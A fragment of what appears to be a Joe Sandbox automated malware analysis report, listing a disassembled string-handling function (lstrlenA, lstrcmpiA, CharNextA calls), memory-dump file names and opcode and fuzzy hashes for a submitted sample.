                                                • Instruction Fuzzy Hash: 93D05E34A50206BADA009FE1FE29E597764AB84304F400869F005890B1EA74C4108B0E
                                                Function 00405DE2 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                                Download Yara Rule
                                                APIs
                                                • lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BFF,00000000,[Rename]), ref: 00405DF2
                                                • lstrcmpiA.KERNEL32(?,?), ref: 00405E0A
                                                • CharNextA.USER32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E1B
                                                • lstrlenA.KERNEL32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E24
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2132797675.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2132780889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132815478.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132939239.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_LVDdWBGnVE.jbxd
                                                Similarity
                                                • API ID: lstrlen$CharNextlstrcmpi
                                                • String ID:
                                                • API String ID: 190613189-0
                                                • Opcode ID: 6101864ab16567e6bb9a2a5d9c8424f3785a5e6dd51bc724eb4dc87483e37eb4
                                                • Instruction ID: 6c750b41c95b6ea6b2c0dd9449a28e86abc919c298eb75f697d1220529daba74
                                                • Opcode Fuzzy Hash: 6101864ab16567e6bb9a2a5d9c8424f3785a5e6dd51bc724eb4dc87483e37eb4
                                                • Instruction Fuzzy Hash: 95F0CD31205558FFCB019FA9DC0499FBBA8EF5A350B2544AAE840E7321D234DE019BA4